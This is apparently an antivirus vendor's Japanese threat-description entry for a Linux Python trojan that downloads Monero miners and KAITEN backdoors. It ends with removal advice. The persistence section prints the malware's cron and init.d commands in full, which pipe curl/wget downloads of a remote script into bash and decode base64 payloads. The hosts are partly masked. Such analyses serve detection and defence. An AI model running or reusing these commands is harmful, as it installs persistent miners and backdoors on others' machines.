Trojan.Python.MALXMR.D
2020年8月31日
別名:
Trojan-Downloader.Python.Miner.b (Kaspersky)
プラットフォーム:
Linux
危険度:
ダメージ度:
感染力:
感染確認数:
情報漏えい:
マルウェアタイプ:
トロイの木馬型
破壊活動の有無:
なし
暗号化:
感染報告の有無 :
はい
概要
感染経路 他のマルウェアからの作成, インターネットからのダウンロード
マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。
詳細
ファイルサイズ 13,047 bytes
タイプ PY
メモリ常駐 はい
発見日 2020年8月28日
ペイロード URLまたはIPアドレスに接続, ファイルのダウンロード, プロセスの強制終了
侵入方法
マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。
ダウンロード活動
マルウェアは、以下のWebサイトにアクセスし、不正なファイルをダウンロードして実行します。
- http://{BLOCKED}.{BLOCKED}.61.233/x86_64 -> downloaded file is detected as Coinminer.Linux.MALXMR.UWELD
- http://{BLOCKED}.{BLOCKED}.33.226/i686 -> downloaded file is detected as Coinminer.Linux.MALXMR.UWELD
- http://{BLOCKED}.{BLOCKED}.113.151/go
- http://{BLOCKED}.{BLOCKED}.113.151/x64b -> downloaded file is detected as Backdoor.Linux.KAITEN.AMR
- http://{BLOCKED}.{BLOCKED}.113.151/x32b -> downloaded file is detected as Backdoor.Linux.KAITEN.AMV
その他
マルウェアは、以下を実行します。
- Terminates processes connected to the following ports:
- :3333
- :4444
- :5555
- :7777
- :14444
- :5790
- :45700
- :2222
- :9999
- :20580
- :13531
- Terminates processes connected to the following IP:
- {BLOCKED}.{BLOCKED}.24.12:8080
- {BLOCKED}.{BLOCKED}.17.13:8080
- {BLOCKED}.{BLOCKED}.11.170:443
- It creates the following cron jobs for persistence:
- Path: /etc/cron.d/root
- Schedule: Every Minute
- Command: */1 * * * * root (curl -s http://{BLOCKED}.{BLOCKED}.113.151/xmi||wget -q -O - http://{BLOCKED}.{BLOCKED}.113.151/xmi)|bash -sh; echo {base 64 encoded string} | base64 -d | bash -; lwp-download http://{BLOCKED}.{BLOCKED}.113.151/xmi /tmp/xmi; bash /tmp/xmi; rm -rf /tmp/xmi\n##
- Path: /etc/cron.d/apache/root
- Schedule: Every Two Minutes
- Command: */2 * * * * root (curl -s http://{BLOCKED}.{BLOCKED}.113.151/xmi||wget -q -O - http://{BLOCKED}.{BLOCKED}.113.151/xmi)|bash -sh; echo {base 64 encoded string} | base64 -d | bash -; lwp-download http://{BLOCKED}.{BLOCKED}.113.151/xmi /tmp/xmi; bash /tmp/xmi; rm -rf /tmp/xmi\n##
- Path: /etc/cron.d/nginx
- Schedule: Every Three Minutes
- Command: */3 * * * * root lwp-download http://{BLOCKED}.{BLOCKED}.113.151/xmi /tmp/.xo; bash /tmp/.xo; rm -rf /tmp.xo\n##
- Path: /var/spool/cron/root
- Schedule: Every Thirty Minutes
- Command: */30 * * * * (curl -s http://{BLOCKED}.{BLOCKED}.113.151/xmi||wget -q -O - http://{BLOCKED}.{BLOCKED}.113.151/xmi)|bash -sh; echo {base 64 encoded string} | base64 -d | bash -; lwp-download http://{BLOCKED}.{BLOCKED}.113.151/xmi /tmp/xmi; bash /tmp/xmi\n; rm -rf /tmp/xmi\n##
- Path: /var/spool/cron/crontabs/root
- Schedule: Every Minute
- Command: * * * * * (curl -s http://{BLOCKED}.{BLOCKED}.113.151/xmi||wget -q -O - http://{BLOCKED}.{BLOCKED}.113.151/xmi)|bash -sh; echo {base 64 encoded string} | base64 -d | bash -; lwp-download http://{BLOCKED}.{BLOCKED}.113.151/xmi /tmp/xmi; bash /tmp/xmi; rm -rf /tmp/xmi\n##
- Path: /etc/cron.hourly/oanacroner1
- Schedule: Every Hour
- Command: (curl -fsSL http://{BLOCKED}.{BLOCKED}.113.151/xmi||wget -q -O- http://{BLOCKED}.{BLOCKED}.113.151/xmi)|bash -sh; echo {base 64 encoded string} | base64 -d | bash -; lwp-download http://{BLOCKED}.{BLOCKED}.113.151/xmi /tmp/xmi; bash /tmp/xmi; rm -rf /tmp/xmi
- It creates the following service for persistence:
- Path: /etc/init.d/down
- Command: (curl -fsSL http://{BLOCKED}.{BLOCKED}.113.151/xmi||wget -q -O- http://{BLOCKED}.{BLOCKED}.113.151/xmi)|bash -sh; echo "{base 64 encoded string}" | base64 -d | bash -'
対応方法
対応検索エンジン: 9.850
初回 VSAPI パターンバージョン 16.153.00
初回 VSAPI パターンリリース日 2020年8月8日
VSAPI OPR パターンバージョン 16.154.00
VSAPI OPR パターンリリース日 2020年8月9日
最新のバージョン(エンジン、パターンファイル)を導入したウイルス対策製品を用い、ウイルス検索を実行してください。「Trojan.Python.MALXMR.D」と検出したファイルはすべて削除してください。 検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。
ご利用はいかがでしたか? アンケートにご協力ください